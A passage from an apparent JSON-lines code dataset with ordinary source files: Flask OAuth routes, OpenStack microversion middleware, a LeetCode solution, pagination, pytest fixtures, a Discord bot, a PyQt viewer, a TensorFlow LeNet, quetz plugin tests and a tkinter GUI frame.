Flask, g, request, redirect, render_template, Response, session\n\n\nfrom weiboHandle import *\nfrom qqweiboHandle import *\n\n\napp = Flask(__name__)\napp.debug = True\n\n@app.route('/')\ndef home_page():\n return render_template( 'home_page.html', content = 'hello world' )\n\n@app.route('/login_to_weibo')\ndef login_to_weibo():\n\turl = loginWeibo()\n\treturn redirect( url )\n\t\n\n@app.route('/oauth_weibo', methods = ['POST', 'GET'])\ndef oauth_weibo():\n\tif request.method == \"GET\":\n\t\tcode = request.args.get(\"code\")\n\t\tcontent = getAccessToken( code )\n\t\treturn render_template( 'home_page.html', content_weibo = content )\n\n\n@app.route('/login_to_qq')\ndef login_to_qq():\n url = loginQq()\n return redirect( url )\n\n@app.route('/oauth_qq', methods = ['POST', 'GET'])\ndef oauth_qq():\n if request.method == \"GET\":\n code = request.args.get('code')\n open_id = request.args.get('openid')\n content = getQQAccessToken( code, open_id )\n return render_template( 'home_page.html', content_qq = content )","sub_path":"1/routers.py","file_name":"routers.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"25303390","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Microversion handling.\"\"\"\n\n# NOTE(cdent): This code is taken from enamel:\n# https://github.com/jaypipes/enamel and was the original source of\n# the code now used in microversion_parse library.\n\nimport collections\nimport inspect\n\nimport microversion_parse\nimport webob\n\n# NOTE(cdent): avoid cyclical import conflict between util and\n# microversion\nimport nova.api.openstack.placement.util\nfrom nova.i18n import _\n\n\nSERVICE_TYPE = 'placement'\nMICROVERSION_ENVIRON = '%s.microversion' % SERVICE_TYPE\nVERSIONED_METHODS = collections.defaultdict(list)\n\n# The Canonical Version List\nVERSIONS = [\n '1.0',\n '1.1', # initial support for aggregate.get_aggregates and set_aggregates\n '1.2', # Adds /resource_classes resource endpoint\n '1.3', # Adds 'member_of' query parameter to get resource providers\n # that are members of any of the listed aggregates\n '1.4', # Adds resources query string parameter in GET /resource_providers\n '1.5', # Adds DELETE /resource_providers/{uuid}/inventories\n '1.6', # Adds /traits and /resource_providers{uuid}/traits resource\n # endpoints\n '1.7', # PUT /resource_classes/{name} is bodiless create or update\n '1.8', # Adds 'project_id' and 'user_id' required request parameters to\n # PUT /allocations\n '1.9', # Adds GET /usages\n '1.10', # Adds GET /allocation_candidates resource endpoint\n '1.11', # Adds 'allocations' link to the GET /resource_providers response\n '1.12', # Add project_id and user_id to GET /allocations/{consumer_uuid}\n # and PUT to /allocations/{consumer_uuid} in the same dict form\n # as GET. The 'allocation_requests' format in GET\n # /allocation_candidates is updated to be the same as well.\n '1.13', # Adds POST /allocations to set allocations for multiple consumers\n '1.14', # Adds parent and root provider UUID on resource provider\n # representation and 'in_tree' filter on GET /resource_providers\n '1.15', # Include last-modified and cache-control headers\n]\n\n\ndef max_version_string():\n return VERSIONS[-1]\n\n\ndef min_version_string():\n return VERSIONS[0]\n\n\ndef parse_version_string(version_string):\n \"\"\"Turn a version string into a Version\n\n :param version_string: A string of two numerals, X.Y, or 'latest'\n :returns: a Version\n :raises: TypeError\n \"\"\"\n if version_string == 'latest':\n version_string = max_version_string()\n try:\n # The combination of int and a limited split with the\n # named tuple means that this incantation will raise\n # ValueError or TypeError when the incoming data is\n # poorly formed but will, however, naturally adapt to\n # extraneous whitespace.\n return Version(*(int(value) for value\n in version_string.split('.', 1)))\n except (ValueError, TypeError) as exc:\n raise TypeError('invalid version string: %s; %s' % (\n version_string, exc))\n\n\nclass MicroversionMiddleware(object):\n \"\"\"WSGI middleware for getting microversion info.\"\"\"\n\n def __init__(self, application):\n self.application = application\n\n @webob.dec.wsgify\n def __call__(self, req):\n util = nova.api.openstack.placement.util\n try:\n microversion = extract_version(req.headers)\n except ValueError as exc:\n raise webob.exc.HTTPNotAcceptable(\n _('Invalid microversion: %(error)s') % {'error': exc},\n json_formatter=util.json_error_formatter)\n except TypeError as exc:\n raise webob.exc.HTTPBadRequest(\n _('Invalid microversion: %(error)s') % {'error': exc},\n json_formatter=util.json_error_formatter)\n\n req.environ[MICROVERSION_ENVIRON] = microversion\n microversion_header = '%s %s' % (SERVICE_TYPE, microversion)\n\n try:\n response = req.get_response(self.application)\n except webob.exc.HTTPError as exc:\n # If there was an error in the application we still need\n # to send the microversion header, so add the header and\n # re-raise the exception.\n exc.headers.add(Version.HEADER, microversion_header)\n raise exc\n\n response.headers.add(Version.HEADER, microversion_header)\n response.headers.add('vary', Version.HEADER)\n return response\n\n\nclass Version(collections.namedtuple('Version', 'major minor')):\n \"\"\"A namedtuple containing major and minor values.\n\n Since it is a tuple is automatically comparable.\n \"\"\"\n\n HEADER = 'OpenStack-API-Version'\n\n MIN_VERSION = None\n MAX_VERSION = None\n\n def __str__(self):\n return '%s.%s' % (self.major, self.minor)\n\n @property\n def max_version(self):\n if not self.MAX_VERSION:\n self.MAX_VERSION = parse_version_string(max_version_string())\n return self.MAX_VERSION\n\n @property\n def min_version(self):\n if not self.MIN_VERSION:\n self.MIN_VERSION = parse_version_string(min_version_string())\n return self.MIN_VERSION\n\n def matches(self, min_version=None, max_version=None):\n if min_version is None:\n min_version = self.min_version\n if max_version is None:\n max_version = self.max_version\n return min_version <= self <= max_version\n\n\ndef extract_version(headers):\n \"\"\"Extract the microversion from Version.HEADER\n\n There may be multiple headers and some which don't match our\n service.\n \"\"\"\n found_version = microversion_parse.get_version(headers,\n service_type=SERVICE_TYPE)\n\n version_string = found_version or min_version_string()\n request_version = parse_version_string(version_string)\n # We need a version that is in VERSION and within MIX and MAX.\n # This gives us the option to administratively disable a\n # version if we really need to.\n if (str(request_version) in VERSIONS and request_version.matches()):\n return request_version\n raise ValueError('Unacceptable version header: %s' % version_string)\n\n\n# From twisted\n# https://github.com/twisted/twisted/blob/trunk/twisted/python/deprecate.py\ndef _fully_qualified_name(obj):\n \"\"\"Return the fully qualified name of a module, class, method or function.\n\n Classes and functions need to be module level ones to be correctly\n qualified.\n \"\"\"\n try:\n name = obj.__qualname__\n except AttributeError:\n name = obj.__name__\n\n if inspect.isclass(obj) or inspect.isfunction(obj):\n moduleName = obj.__module__\n return \"%s.%s\" % (moduleName, name)\n elif inspect.ismethod(obj):\n try:\n cls = obj.im_class\n except AttributeError:\n # Python 3 eliminates im_class, substitutes __module__ and\n # __qualname__ to provide similar information.\n return \"%s.%s\" % (obj.__module__, obj.__qualname__)\n else:\n className = _fully_qualified_name(cls)\n return \"%s.%s\" % (className, name)\n return name\n\n\ndef _find_method(f, version, status_code):\n \"\"\"Look in VERSIONED_METHODS for method with right name matching version.\n\n If no match is found a HTTPError corresponding to status_code will\n be returned.\n \"\"\"\n qualified_name = _fully_qualified_name(f)\n # A KeyError shouldn't be possible here, but let's be robust\n # just in case.\n method_list = VERSIONED_METHODS.get(qualified_name, [])\n for min_version, max_version, func in method_list:\n if min_version <= version <= max_version:\n return func\n\n raise webob.exc.status_map[status_code]\n\n\ndef version_handler(min_ver, max_ver=None, status_code=404):\n \"\"\"Decorator for versioning API methods.\n\n Add as a decorator to a placement API handler to constrain\n the microversions at which it will run. Add after the\n ``wsgify`` decorator.\n\n This does not check for version intersections. That's the\n domain of tests.\n\n :param min_ver: A string of two numerals, X.Y indicating the\n minimum version allowed for the decorated method.\n :param max_ver: A string of two numerals, X.Y, indicating the\n maximum version allowed for the decorated method.\n :param status_code: A status code to indicate error, 404 by default\n \"\"\"\n def decorator(f):\n min_version = parse_version_string(min_ver)\n if max_ver:\n max_version = parse_version_string(max_ver)\n else:\n max_version = parse_version_string(max_version_string())\n qualified_name = _fully_qualified_name(f)\n VERSIONED_METHODS[qualified_name].append(\n (min_version, max_version, f))\n\n def decorated_func(req, *args, **kwargs):\n version = req.environ[MICROVERSION_ENVIRON]\n return _find_method(f, version, status_code)(req, *args, **kwargs)\n\n # Sort highest min version to beginning of list.\n VERSIONED_METHODS[qualified_name].sort(key=lambda x: x[0],\n reverse=True)\n return decorated_func\n return decorator\n","sub_path":"nova/api/openstack/placement/microversion.py","file_name":"microversion.py","file_ext":"py","file_size_in_byte":9707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"312677707","text":"# we need to have two arrays to record maximum products and miniumum products\n\nfrom typing import List\n\nclass Solution:\n def maxProduct(self, nums: List[int]) -> int:\n N = len(nums)\n minDP = nums[0]\n maxDP = nums[0]\n \n ret = maxDP\n for i in range(1, N):\n minDP, maxDP = min(minDP * nums[i], maxDP * nums[i], nums[i]), max(minDP * nums[i], maxDP * nums[i], nums[i])\n ret = max(maxDP, ret)\n \n return ret\n \n \n def maxProduct1(self, nums: List[int]) -> int:\n N = len(nums)\n \n minDP = [0 for _ in range(N)]\n maxDP = [0 for _ in range(N)]\n minDP[0] = nums[0]\n maxDP[0] = nums[0]\n \n for i in range(1, N):\n minDP[i] = min(minDP[i - 1] * nums[i], maxDP[i - 1] * nums[i], nums[i])\n maxDP[i] = max(minDP[i - 1] * nums[i], maxDP[i - 1] * nums[i], nums[i])\n \n return max(maxDP)","sub_path":"leetcode/152-Maximum-Product-Subarray.py","file_name":"152-Maximum-Product-Subarray.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"335856371","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# 导入系统模块\n\n# 第三方模块\n\n# 导入自定义模块\n\n# 设置环境变量\n\n\nclass Pagination(object):\n def __init__(self, page, url_base, url_params, data_count, entries=10, show_pages=5):\n \"\"\"\n 分页初始化\n :param page: 当前页码\n :param url_base: 请求的URL基础部分\n :param url_params: 请求的URL参数部分\n :param data_count: 请求的数据总条数\n :param entries: 每页显示的记录条目数\n :param show_pages: 页码显示的页码,正负操作\n \"\"\"\n self.url_base = url_base\n try:\n self.page = int(page)\n # 如果页码数小于等于0,取1\n if self.page <= 0:\n raise Exception()\n except Exception as e:\n self.page = 1\n self.url_params = url_params\n self.page = page # 页码第X页\n self.entries = entries # 每页显示条目数量\n\n self.page_count, r = divmod(data_count, entries) # 页码的总数,根据记录总数和每页显示条目计算得出, 如果余数不为0,需增加一页\n if r != 0:\n self.page_count += 1\n\n self.show_pages = show_pages\n\n # 根据当前页码,计算页码起始,如果当前页 - 页面范围 小于0 起始为1 ,否则为差值\n self.page_index_start = self.page - self.show_pages if self.page > self.show_pages else 1\n # 根据当前页码,计算页码结束,如果当前页码 + 页面范围 小于 页面总数,则取加值,否则取 页面总数\n self.page_index_end = self.page + self.show_pages if (self.page + self.show_pages) < self.page_count else self.page_count\n\n @property\n def data_index_start(self):\n \"\"\"\n 数据获取值起始索引\n :return:\n \"\"\"\n return (self.page - 1) * self.entries\n\n @property\n def data_index_end(self):\n \"\"\"\n 数据获取值结束索引\n :return:\n \"\"\"\n return self.page * self.entries\n\n def get_page_index_html(self, page_num, page_type='default'):\n\n self.url_params['page'] = page_num\n\n if page_type == 'default':\n if self.page == page_num:\n page_index_html = '
  • %s
  • ' \\\n % (self.url_base, self.url_params.urlencode(), page_num)\n else:\n page_index_html = '
  • %s
  • ' \\\n % (self.url_base, self.url_params.urlencode(), page_num)\n else:\n if page_type == 'first':\n icon = 'fa-step-backward'\n elif page_type == 'prev':\n icon = 'fa-angle-double-left'\n elif page_type == 'next':\n icon = 'fa-angle-double-right'\n elif page_type == 'last':\n icon = 'fa-step-forward'\n else:\n icon = ''\n page_index_html = '
  • ' \\\n % (self.url_base, self.url_params.urlencode(), icon)\n\n return page_index_html\n\n def get_page_html(self):\n \"\"\"\n 生成分页的HTML页码\n 效果 [\n 每页数量 | 第一页 前一页 1 2 3 4 5 6 7 8 9 后一页 最后页\n |<< < 11 12 13 14 15 16 17 18 19 20 21 > >>|\n ]\n :return:\n \"\"\"\n page_index_first = self.get_page_index_html(page_type='first', page_num=1)\n page_index_last = self.get_page_index_html(page_type='last', page_num=self.page_count)\n\n # 前一页,后一页设置\n if self.page <= 1:\n # 如果请求当前页码,小于等于 1,那么前一页的链接地址为当前页\n page_index_prev = self.get_page_index_html(page_type='prev', page_num=1)\n page_index_next = self.get_page_index_html(page_type='next', page_num=self.page + 1)\n elif self.page >= self.page_count:\n # 如果请求当前页码,是最后一页,那么下一页的链接地址为#\n page_index_prev = self.get_page_index_html(page_type='prev', page_num=self.page - 1)\n page_index_next = self.get_page_index_html(page_type='next', page_num=self.page_count)\n else:\n # 其他\n # 如果请求当前页码,大于1 ,那么前一页的前进地址为,当前页码-1,并将url参数带上\n page_index_prev = self.get_page_index_html(page_type='prev', page_num=self.page - 1)\n page_index_next = self.get_page_index_html(page_type='next', page_num=self.page + 1)\n\n #\n page_index_list = []\n page_index_list.extend([page_index_first, page_index_prev])\n\n for i in range(self.page_index_start, self.page_index_end + 1):\n page_index_t = self.get_page_index_html(page_num=i)\n page_index_list.append(page_index_t)\n\n page_index_list.extend([page_index_next, page_index_last])\n\n page_html_str = \"\".join(page_index_list)\n return page_html_str\n","sub_path":"app_c_stark/utils/pagination.py","file_name":"pagination.py","file_ext":"py","file_size_in_byte":5159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"348630607","text":"import os\n\nimport pytest\nimport requests\nfrom urllib3.util.retry import Retry\n\nBUILDKITE = os.environ.get(\"BUILDKITE\") is not None\n\n\n@pytest.fixture\ndef retrying_requests():\n session = requests.Session()\n session.mount(\n \"http://\", requests.adapters.HTTPAdapter(max_retries=Retry(total=5, backoff_factor=1))\n )\n yield session\n\n\n@pytest.fixture\ndef test_directory(request):\n yield os.path.dirname(request.fspath)\n\n\n@pytest.fixture\ndef test_id(testrun_uid):\n yield testrun_uid\n","sub_path":"python_modules/dagster-test/dagster_test/fixtures/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"244878266","text":"#bot.py\nimport os\n\nimport discord\nfrom dotenv import load_dotenv\nfrom datetime import datetime\nimport pytz\n\nload_dotenv()\nTOKEN = os.getenv('DISCORD_TOKEN')\n\nclient = discord.Client()\n\n@client.event\nasync def on_ready():\n print(f'{client.user} has connected to Discord!')\n\n@client.event\nasync def on_message(message):\n if message.author == client.user:\n return\n \n if message.content == 'hello':\n tz = pytz.timezone('Europe/Paris')\n fmt = '%H:%M'\n timeNow = datetime.now(tz)\n if timeNow.hour > 0 and timeNow.hour < 6:\n await message.channel.send('It is ' + f'{timeNow.strftime(fmt)}' + ' <@' + f'{message.author.id}' + '>' + ' why arent you sleeping?' )\n else:\n return\n\nclient.run(TOKEN)\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"28699635","text":"\"\"\"\nMain View Controller\n\n@author: Yolanda Vives\n\n@status: Sets up the main view, its views and controllers\n@todo:\n\n\"\"\"\n#from PyQt5.QtWidgets import QPushButton\nfrom controller.operations import Operations\nfrom PyQt5.uic import loadUiType, loadUi\nimport sys\nsys.path.append('../marcos_client')\nimport cgitb \ncgitb.enable(format = 'text')\nimport pdb\nst = pdb.set_trace\nimport scipy.io\nfrom PyQt5 import QtCore\nfrom PyQt5 import QtGui\nfrom PyQt5.QtWidgets import QFileDialog, QMessageBox, QLabel, QVBoxLayout, QPushButton, QSpacerItem, QSizePolicy, QTextEdit\nfrom PyQt5.QtCore import pyqtSlot\nfrom utilities import change_axes\nimport numpy as np\nimport pyqtgraph as pg\nimport pyqtgraph.opengl as gl\nimport pyqtgraph.functions as fn\nfrom datetime import date, datetime \n\nMainWindow_Form, MainWindow_Base = loadUiType('ui/mainview_v2.ui')\n\nclass MainViewController(MainWindow_Form, MainWindow_Base):\n \"\"\"\n MainViewController Class\n \"\"\"\n \n def __init__(self):\n super(MainViewController, self).__init__()\n self.ui = loadUi('ui/mainview_v2.ui')\n self.setupUi(self)\n \n self.tab=Operations(self)\n self.layout_operations.addWidget(self.tab)\n \n # Toolbar Actions\n self.action_load.triggered.connect(self.load_file)\n self.action_save.triggered.connect(self.save)\n self.action_close.triggered.connect(self.close) \n self.action_plot.triggered.connect(self.plot3D) \n self.action_reload.triggered.connect(self.reload) \n \n # Status bar\n self.statusBar.showMessage('No file loaded')\n \n # Console\n self.cons = self.generateConsole('')\n\n# sys.stdout = EmittingStream(textWritten=self.onUpdateText)\n \n \n# sys.stderr = EmittingStream(textWritten=self.onUpdateText) \n\n \n @staticmethod\n def generateConsole(text):\n con = QTextEdit()\n con.setText(text)\n return con\n \n def onUpdateText(self, text):\n cursor = self.cons.textCursor()\n cursor.movePosition(QtGui.QTextCursor.End)\n cursor.insertText(text)\n self.cons.setTextCursor(cursor)\n self.cons.ensureCursorVisible()\n\n\n def close(self):\n sys.exit() \n \n def load_file(self):\n \n# self.clearPlotviewLayout()\n self.file_name, _ = QFileDialog.getOpenFileName(self, 'Open File', \"/share_vm/results_experiments/\")\n self.plot_title='K-Space (abs) loaded data'\n \n if self.file_name:\n self.data_loaded= scipy.io.loadmat(self.file_name)\n \n axes=self.data_loaded[\"axes\"]\n axis1=axes[0, 0]\n axis2=axes[0, 1]\n axis3=axes[0, 2]\n n=self.data_loaded[\"n\"]\n n1=n[0, 0]\n n2=n[0, 1]\n n3=n[0, 2]\n x, y, z, self.n_rd, self.n_ph, self.n_sl = change_axes(axis1,axis2,axis3,n1,n2,n3)\n self.ns = [self.n_rd, self.n_ph, self.n_sl]\n average=self.data_loaded[\"average\"]\n self.data_kS = np.reshape(average, (self.n_sl, self.n_ph, self.n_rd))\n self.data=self.data_kS\n \n self.statusBar.clearMessage()\n self.statusBar.showMessage(self.file_name)\n else:\n self.file=QLabel(\"No file loaded\")\n self.statusBar.addWidget(self.file)\n\n def save(self):\n \n dt = datetime.now()\n dt_string = dt.strftime(\"%d-%m-%Y_%H_%M\")\n# dict = vars(defaultsequences[self.sequence]) \n# \n# sequ = '%s' %(self.sequence)\n# sequ = sequ.replace(\" \", \"\")\n# f = open(\"experiments/parameterisations/%s_params_%s.txt\" % (sequ, dt_string),\"w\")\n# f.write( str(dict) )\n# f.close()\n \n self.messages(\"Saved\")\n\n \n def reload(self):\n \n self.data_loaded= scipy.io.loadmat(self.file_name)\n average=self.data_loaded[\"average\"]\n self.data_kS = np.reshape(average, (self.n_sl, self.n_ph, self.n_rd))\n self.data=self.data_kS\n self.plot_title='K-Space (abs) loaded data'\n self.plot3D()\n self.messages(\"Original file reloaded\") \n\n \n \n #############################################################\n ######################## 3D plot ###############################\n #############################################################\n \n def plot3D(self): \n \n self.clearLayoutPlots()\n \n self.layout_output.addWidget(self.cons)\n \n if hasattr(self, 'data'):\n t=np.iscomplex(self.data)\n if np.any(t):\n self.data3D=np.abs(self.data)\n else:\n self.data3D=self.data\n \n with np.errstate(divide = 'ignore'):\n positive = np.log(fn.clip_array(self.data3D, 0, self.data3D.max())**2)\n# negative = np.log(fn.clip_array(-fft, 0, -fft.min())**2)\n d2 = np.empty(self.data3D.shape + (4,), dtype=np.ubyte)\n d2[..., 0] = positive * (255./positive.max())\n d2[..., 1] = 0\n d2[..., 2] = d2[...,1]\n d2[..., 3] = d2[..., 0]*0.3 + d2[..., 1]*0.3\n d2[..., 3] = (d2[..., 3].astype(float) / 255.) **2 * 255\n\n d2[:, 0, 0] = [255,0,0,100]\n d2[0, :, 0] = [0,255,0,100]\n d2[0, 0, :] = [0,0,255,100]\n \n self.w = gl.GLViewWidget()\n v = gl.GLVolumeItem(d2)\n self.w.addItem(v)\n\n self.layout_plots.addWidget(self.w)\n \n #############################################################\n ######################## ImageView Plot ###########################\n #############################################################\n \n self.layout2 = QVBoxLayout()\n self.b1 = QPushButton('Change View', self)\n self.layout2.addWidget(self.b1)\n self.label = QLabel(\"%s\" % (self.plot_title))\n self.label.setAlignment(QtCore.Qt.AlignCenter)\n self.label.setStyleSheet(\"background-color: black;color: white\")\n self.layout2.addWidget(self.label)\n self.w1 = pg.ImageView()\n self.w1.setImage(self.data3D)\n self.roi = pg.RectROI([0, 0], [5,5], pen='r')\n# \n# value = self.w1.getRoiPlot()\n# print(value)\n self.w1.addItem(self.roi)\n\n self.layout2.addWidget(self.w1)\n self.layout_plots.addLayout(self.layout2)\n\n self.b1.clicked.connect(self.button_clicked)\n \n self.w1.roi.sigRegionChanged.connect(self.roi_avg)\n \n# selected = self.w1.roiChanged()\n# selected = self.roi.getArrayRegion(self.data3D, self.w1)\n# print(selected.mean(axis=0))\n \n else:\n self.messages(\"No data loaded\") \n \n @pyqtSlot()\n def roi_avg(self):\n for i in reversed(range(self.layout_plots.count())):\n if hasattr(self.layout_plots.itemAt(i).widget(), 'roi') :\n selected =self.layout_plots.itemAt(i).widget().roi.getArrayRegion(self.data,self.layout_plots.itemAt(i).widget().getImageItem(), axes=(0,1))\n nonzeroVals = selected[np.nonzero(selected)]\n print(np.mean(nonzeroVals))\n \n def messages(self, text):\n \n msg = QMessageBox()\n msg.setIcon(QMessageBox.Information)\n msg.setText(text)\n msg.exec();\n \n def clearLayoutPlots(self):\n \n for i in reversed(range(self.layout_plots.count())):\n if self.layout_plots.itemAt(i).layout():\n self.layout_plots.itemAt(i).layout().setParent(None)\n else:\n self.layout_plots.itemAt(i).widget().setParent(None)\n \n \n @pyqtSlot()\n def button_clicked(self):\n \n self.clearLayoutPlots()\n im = self.data\n self.data=np.moveaxis(im, 0, -1)\n \n self.b1.setChecked(False)\n self.plot3D()\n \nclass ImageView(pg.ImageView):\n\n # constructor which inherit original\n # ImageView\n def __init__(self, *args, **kwargs):\n pg.ImageView.__init__(self, *args, **kwargs)\n\n # roi changed method\n def roiChanged(self):\n\n # printing message\n print(\"ROI Changed\") \n# self.roi = pg.ImageView.getRoiPlot(self) \n# selected = self.roi.getArrayRegion(self.data, self.w1)\n# print(selected.mean(axis=0))\n \nclass EmittingStream(QtCore.QObject):\n\n textWritten = QtCore.pyqtSignal(str)\n\n def write(self, text):\n self.textWritten.emit(str(text))\n\n\n","sub_path":"controller/mainviewcontroller.py","file_name":"mainviewcontroller.py","file_ext":"py","file_size_in_byte":8732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"198786566","text":"import tensorflow as tf\nfrom tensorflow.keras import layers,datasets\nbatch_size = 128\nlr =0.01\nepoches = 10\nsum = 0\n(x,y) ,(x_test,y_test) = datasets.mnist.load_data()\n\ntrain_data = tf.data.Dataset.from_tensor_slices((x,y))\ntest_data = tf.data.Dataset.from_tensor_slices((x_test,y_test))\n\ntrain_data = train_data.shuffle(10000)\ntrain_data = train_data.batch(batch_size)\ntest_data = test_data.batch(batch_size)\ndef process(x,y):\n x = tf.cast(x,dtype=tf.float32)/255\n\n y = tf.cast(y,dtype = tf.int64)\n # y = tf.one_hot(y,depth=10)\n return x,y\n\ntrain_data = train_data.map(process)\ntest_data = test_data.map(process)\ncriteon = tf.losses.CategoricalCrossentropy(from_logits=True)\noptimer = tf.optimizers.SGD(lr)\ntf.optimizers.Adam()\n\n\n\n# class LeNet(tf.keras.Model):\n# def __init__(self):\n# super(LeNet, self).__init__()\n# self.con1 = layers.Conv2D(6,3,1)\n# self.cn2 = layers.Conv2D(16,3,1)\n\n\nnet = tf.keras.Sequential([layers.Conv2D(6,3,1),\n layers.MaxPool2D(2,2),\n layers.ReLU(),\n layers.Conv2D(6,3,1),\n layers.MaxPool2D(2,1),\n layers.ReLU(),\n layers.Flatten(),\n layers.Dense(120,activation = 'relu'),\n layers.Dense(84,activation='relu'),\n layers.Dense(10)])\n\nnet.build((4,28,28,1))\nnet.summary()\n\ndef train(data,epoch):\n for i in range(epoch):\n for x, y in data:\n x = tf.expand_dims(x, axis=3)\n with tf.GradientTape() as tape:\n out = net(x)\n y = tf.one_hot(y,depth=10)\n loss = criteon(y,out)\n grads = tape.gradient(loss,net.trainable_variables)\n optimer.apply_gradients(zip(grads,net.trainable_variables))\n predict(test_data,net)\n\ndef predict(db_test,network):\n correct, total = 0, 0\n for x, y in db_test:\n # 遍历所有训练集样本\n # 插入通道维度,=>[b,28,28,1]\n x = tf.expand_dims(x, axis=3) # 前向计算,获得 10 类别的预测分布,[b, 784] => [b, 10]\n out = network(x)\n # 真实的流程时先经过 softmax,再 argmax\n # 但是由于 softmax 不改变元素的大小相对关系,故省去\n pred = tf.argmax(out, axis=-1)\n y = tf.cast(y, tf.int64)\n # 统计预测正确数量\n correct += float(tf.reduce_sum(tf.cast(tf.equal(pred, y), tf.float32)))\n # 统计预测样本总数\n total += x.shape[0] # 计算准确率\n print('acc:',correct/total)\n\ntrain(train_data,epoches)","sub_path":"LeNet.py","file_name":"LeNet.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"610968386","text":"from pathlib import Path\n\nimport pytest\nfrom httpx import AsyncClient\n\nfrom quetz.authorization import (\n SERVER_MAINTAINER,\n SERVER_MEMBER,\n SERVER_OWNER,\n SERVER_USER,\n)\nfrom quetz.db_models import PackageVersion\nfrom quetz.jobs.models import Job, Task, TaskStatus\nfrom quetz.jobs.runner import check_status, run_jobs, run_tasks\n\n\n@pytest.mark.asyncio\nasync def test_transmutation_endpoint(\n api_key, db, config, work_manager, package_version, app, channel_name\n):\n\n # we need to use asynchronous http client because the test is async\n async with AsyncClient(app=app, base_url=\"http://test\") as ac:\n response = await ac.post(\n \"/api/jobs\",\n json={\"items_spec\": \"*\", \"manifest\": \"quetz-transmutation:transmutation\"},\n headers={\"x-api-key\": api_key.key},\n )\n\n assert response.status_code == 201\n run_jobs(db)\n new_jobs = run_tasks(db, work_manager)\n await new_jobs[0].wait()\n\n check_status(db)\n\n task = db.query(Task).one()\n db.refresh(task)\n assert task.status == TaskStatus.success\n\n pkgstore = config.get_package_store()\n fileh = pkgstore.serve_path(\n channel_name,\n Path(package_version.platform)\n / package_version.filename.replace(\".tar.bz2\", \".conda\"),\n )\n ok_ = fileh.read(10)\n assert ok_\n\n conda_version = (\n db.query(PackageVersion)\n .filter(PackageVersion.package_format == 'conda')\n .one_or_none()\n )\n\n assert conda_version\n\n # cleanup\n try:\n db.query(PackageVersion).delete()\n db.query(Job).delete()\n db.query(Task).delete()\n finally:\n db.commit()\n\n\n@pytest.mark.parametrize(\n \"spec,n_tasks\",\n [\n (\"my-package==0.1\", 1),\n (\"my-package==0.2\", 0),\n (\"my-package==0.1,my-package==0.2\", 1),\n (\"\", 0),\n (None, 0),\n (\"*\", 1),\n ],\n)\ndef test_package_specs(\n auth_client, db, config, work_manager, package_version, spec, n_tasks\n):\n\n response = auth_client.post(\n \"/api/jobs\",\n json={\"items_spec\": spec, \"manifest\": \"quetz-transmutation:transmutation\"},\n )\n\n assert response.status_code == 201\n run_jobs(db)\n run_tasks(db, work_manager)\n\n check_status(db)\n\n n_created_task = db.query(Task).count()\n\n assert n_created_task == n_tasks\n\n # cleanup\n try:\n db.query(PackageVersion).delete()\n db.query(Job).delete()\n db.query(Task).delete()\n finally:\n db.commit()\n\n\n@pytest.mark.parametrize(\n \"user_role,expected_status\",\n [\n (SERVER_OWNER, 201),\n (SERVER_MAINTAINER, 201),\n (SERVER_USER, 401),\n (SERVER_MEMBER, 401),\n ],\n)\ndef test_permissions(auth_client, db, expected_status):\n\n response = auth_client.post(\n \"/api/jobs\",\n json={\"items_spec\": \"*\", \"manifest\": \"quetz-transmutation:transmutation\"},\n )\n\n assert response.status_code == expected_status\n","sub_path":"plugins/quetz_transmutation/tests/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"47310236","text":"from tkinter import ttk\n\nclass FrameBas(ttk.Label):\n\n def __init__(self, parent):\n super().__init__(parent, style=\"Frame.TLabel\")\n self.onzeHeure = parent.onzeHeure\n self.parent = parent\n self.config()\n self.initFrameDuree()\n self.initFrameBoutonsG()\n self.initFrameBoutonsC()\n self.initFrameBoutonsD()\n self.initGrid()\n self.ancienAleatoire = None\n self.ancienRepeat = None\n\n #---------------------------------------------------------------------------\n # Initialisations\n #---------------------------------------------------------------------------\n\n def config(self):\n self.grid(row=2, sticky=\"NEWS\", pady=10)\n self.bind(\"\", self.resizeScale)\n self.scaleDureeLongueur = 0 # Empecher redimentionnement du debut\n self.rowconfigure(0, weight=1)\n self.rowconfigure(1, weight=3)\n self.columnconfigure(0, weight=1)\n self.columnconfigure(1, weight=3)\n self.columnconfigure(2, weight=1)\n\n def initFrameDuree(self):\n self.frameDuree = ttk.Label(self, style=\"Frame.TLabel\")\n self.dureeVar = ttk.Label(self.frameDuree,\n text=\"0:00\", style=\"Default.TLabel\",\n font=(\"Helvetica\", 10))\n self.scaleDuree = ttk.Scale(self.frameDuree,\n orient=\"horizontal\",\n from_=0.0,\n to=100.0,\n style=\"Default.Horizontal.TScale\",\n length=self.onzeHeure.maxX-112,\n command=self.eventScale)\n self.duree = ttk.Label(self.frameDuree,\n text=\"0:00\", style=\"Default.TLabel\",\n font=(\"Helvetica\", 10))\n self.dureeVar.grid(row=0, column=0, sticky=\"NEWS\")\n self.scaleDuree.grid(row=0, column=1, sticky=\"NEWS\", pady=7)\n self.duree.grid(row=0, column=2, 